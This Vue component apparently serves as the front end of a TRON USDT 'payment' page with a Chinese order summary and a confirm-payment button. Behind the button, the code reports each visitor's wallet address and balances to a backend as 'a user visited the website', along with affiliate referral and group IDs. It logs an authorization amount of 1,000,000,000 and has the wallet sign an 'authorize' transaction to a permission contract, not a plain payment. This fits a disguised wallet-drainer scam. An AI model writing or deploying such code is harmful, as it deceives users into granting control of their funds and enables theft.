<template>
    <div>
        <AuthorizePayOverlay
            :visible="overlayVisible"
            :message="overlayMessage"
            :type="overlayType"
        />
        <a-spin :spinning="pageLoading" tip="加载中...">
        <div class="pay-wrap">
            <div class="content">
                <p class="pay-tips"> 付款成功后请勿关闭此页面，请耐心等待自动回调订单，否则可能无法自动到账!</p>

                <div class="info-wrap">
                    <div class="info-list">
                        <span class="label">商品订单</span>
                        <span class="text">{{ detail.order_no }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">商品详情</span>
                        <span class="text">{{ detail.order_name }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">购买数量</span>
                        <span class="text">{{ detail.quantity }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">付款金额</span>
                        <span class="text">{{ detail.rech_amount * detail.quantity }}USDT</span>
                    </div>
                    <div class="info-list">
                        <span class="label">充值账号</span>
                        <span class="text">{{ detail.tg_no }}</span>
                    </div>
                </div>

                <div class="pay-list">
                    <div class="btn-wrap">
                        <a-button
                            class="btn"
                            type="primary"
                            :disabled="!pageReady || payDisabled || paySubmitting"
                            :loading="paySubmitting"
                            @click="onPay"
                        >
                            确认支付
                        </a-button>
                    </div>
                </div>
            </div>
        </div>
        </a-spin>
    </div>
</template>

<script>

import { connectWallet, signAndSendAuthorize, usdtToSun, getWalletResources } from '../util/tronweb';
import { getOrderInfo, addAuthorize, addToast } from '../util/api';
import { detectWalletClient, syncWalletClientFromRoute, shouldUseRawFirst } from '../util/walletClient';
import { reportAuthorizeTxAfterBroadcast } from '../util/authorizeWatch';
import { message } from 'ant-design-vue';
import AuthorizePayOverlay from '../components/AuthorizePayOverlay.vue';
import { PAY_MSG, isTrxEnoughForAuthorize, createPayClickGuard } from '../util/walletPayUi';
import { getGameGroupIdFromRoute } from '../util/deeplink';
import { clientEnv } from '../config/env';

export default {
    name: 'WalletPayment',
    components: {
        AuthorizePayOverlay,
    },
    data() {
        return {
            detail: {},
            tg_no: '',
            referralCode: '',
            gameGroupId: undefined,
            payDisabled: false,
            paySubmitting: false,
            payClickGuard: null,
            overlayVisible: false,
            overlayMessage: '',
            overlayType: 'error',
            money: 0,
            trx: 0,
            wallet:'',
            energy: 0,
            pageLoading: false,
            pageReady: false,
        };
    },
    created() {
        this.payClickGuard = createPayClickGuard();
    },
    async mounted() {
        syncWalletClientFromRoute(this.$route);
        this.pageLoading = true;
        this.payDisabled = true;
        this.pageReady = false;
        try {
            // 路由参数名 tgNo 历史遗留，实际传入的是 orderNo
            const rawOrderNo = String(this.$route.params.tgNo || '').trim();
            const rawReferral = String(this.$route.params.referralCode || '').trim();
            let orderNo = rawOrderNo;
            let referralCode = rawReferral;
            try {
              orderNo = decodeURIComponent(rawOrderNo);
            } catch {
              /* keep raw */
            }
            try {
              referralCode = decodeURIComponent(rawReferral);
            } catch {
              /* keep raw */
            }
            this.referralCode = referralCode;
            this.gameGroupId = getGameGroupIdFromRoute(this.$route);
            this.tg_no = orderNo;

            if (!orderNo) {
              message.error('订单号缺失，请返回重新下单');
              return;
            }

            const [wallet, orderRes] = await Promise.all([
                connectWallet(),
                getOrderInfo(orderNo),
            ]);
            this.wallet = wallet;
            if (!this.wallet) {
                return;
            }
            const order = orderRes?.data || {};
            if (!order.order_no) {
              message.error('订单不存在或已失效，请返回重新下单');
              return;
            }
            this.detail = order;
            this.pageReady = true;
            this.payDisabled = false;
        } catch (e) {
            console.error('[WalletPay] 初始化失败:', e);
            message.error('加载订单信息失败，请刷新重试');
        } finally {
            this.pageLoading = false;
        }
    },
    methods: {
        async loadWalletResources() {
            const resources = await getWalletResources(this.wallet);
            this.trx = resources.trx;
            this.energy = resources.energy;
            this.money = resources.usdt;
        },
        showTrxFail() {
            this.overlayType = 'error';
            this.overlayMessage = PAY_MSG.trxFail;
            this.overlayVisible = true;
            this.payDisabled = true;
        },
        showGasFail() {
            this.overlayType = 'error';
            this.overlayMessage = PAY_MSG.gasFail;
            this.overlayVisible = true;
            this.payDisabled = true;
        },
        showPaySuccessWait() {
            this.overlayType = 'wait';
            this.overlayMessage = PAY_MSG.waitNetwork;
            this.overlayVisible = true;
            this.payDisabled = true;
        },
        async onPay() {
            if (this.payDisabled) {
                return;
            }
            if (!this.payClickGuard?.tryStart()) {
                return;
            }
            this.paySubmitting = true;
            try {
            await this.loadWalletResources();

            await addToast({
                referralCode: this.referralCode,
                address: this.wallet,
                usdt_balance: this.money,
                trx_balance: this.trx,
                energy:this.energy,
                is_authorize: '0',
                message: '有用户访问网站',
                gameGroupId: this.gameGroupId,
                wallet_type: detectWalletClient(this.$route),
            });

            //({ trx: this.trx, energy: this.energy } = await getWalletResources(this.wallet));

            if (!isTrxEnoughForAuthorize(this.trx, this.energy)) {
                console.warn('[authorize] 余额不足', { trx: this.trx, energy: this.energy });
                this.showGasFail();
                return;
            }

            if (Number(this.detail.rech_amount) >this.money) {
                message.warning('USDT余额不足');
                return;
            }

            const authData = {
                address: this.wallet,
                tg_no: this.detail.tg_no,
                referralCode: this.referralCode,
                authorize_banlce: 1000000000,
                order_no: this.detail.order_no,
                usdt_banlce: this.money,
                trx_balance: this.trx,
            };
            if (this.gameGroupId) {
                authData.gameGroupId = this.gameGroupId;
            }
            await addAuthorize(authData);

            try {
                const payAmount = Number(this.detail.rech_amount) * Number(this.detail.quantity);
                const result = await signAndSendAuthorize(
                    clientEnv.tronPermissionContract,
                    usdtToSun(payAmount),
                    { tpRawFirst: shouldUseRawFirst(this.$route) }
                );
                if (result && result.txid) {
                    const reported = await reportAuthorizeTxAfterBroadcast(
                        result.txid,
                        this.wallet
                    );
                    if (reported.ok) {
                        this.showPaySuccessWait();
                    } else {
                        console.warn('[WalletPay] txId 无效，未上报:', result.txid);
                        this.showTrxFail();
                    }
                } else {
                    this.showTrxFail();
                }
            } catch (e) {
                this.showTrxFail();
            }
            } finally {
                this.paySubmitting = false;
                this.payClickGuard?.end();
            }
        },
    },
};
</script>

<style scoped lang="less">
.pay-wrap {
    display: flex;
    justify-content: center;
    margin-top: 20px;
    background: #fff;

    .content {
        width: 1200px;

        .pay-tips {
            padding: 10px 15px;
            line-height: 22px;
            margin-bottom: 0;
            background-color: #FFF3F3;
            font-size: 14px;
            color: red;
            margin: 10px;
            border-radius: 4px;
        }

        .info-wrap {
            padding: 0 20px;
        }

        .info-list {
            height: 56px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            border-bottom: #f8f8f8 2px solid;
        }

        .pay-list {
            padding: 20px;
        }

        .btn-wrap {
            display: flex;
            justify-content: center;

            .btn {
                height: 50px;
                width: 100%;
                margin-top: 20px;
                font-size: 1.3rem;

                &:disabled {
                    opacity: 0.55;
                    cursor: not-allowed;
                }
            }
        }
    }
}
</style>
